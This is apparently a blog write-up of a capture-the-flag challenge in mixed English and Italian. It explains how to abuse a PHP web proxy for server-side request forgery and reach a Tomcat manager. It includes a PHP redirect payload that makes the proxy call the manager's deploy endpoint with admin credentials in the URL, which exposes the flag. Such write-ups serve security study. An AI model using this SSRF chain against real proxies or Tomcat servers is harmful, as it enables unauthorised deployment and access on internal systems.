CTF Challenge Description:

The challenge contains a php webproxy and a Tomcat server which has the Tomcat manager app deployed andwas only accessible via the php webproxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxycontainer and it has a few open issues, including some that look like they could be security-relevant.

Soluzione

To visit the tomcat container from the proxy, simply enter 127.0.0.1:8888 to view the tomcat webpage. Tomcat mentions an admin interface should be at /manager/html but upon visiting 127.0.0.1:8888/manager/html through the proxy we get a “401 unauthorized” error.

We also find the username and password (manager-web.xml) and that /manager/text exists as an interface for scripts.

Possiamo usare /manager/text/deploy to deploy the folder that contains the flag and visit that like any other webpage.

Cyber Security Study Notes

Note sullo studio OSCP

Then we can host this on our local attacker machine. The server address can be:

http://127.0.0.1:8000/test

<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to  http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}

CTF Walkthrough Playlist

,
Mostra commenti

Motasem

Circa l'autore

Creo note sulla sicurezza informatica, note di marketing digitale e corsi online. Fornisco anche consulenza di marketing digitale, inclusi ma non limitati a SEO, annunci Google e Meta e amministrazione CRM.

Visualizza articoli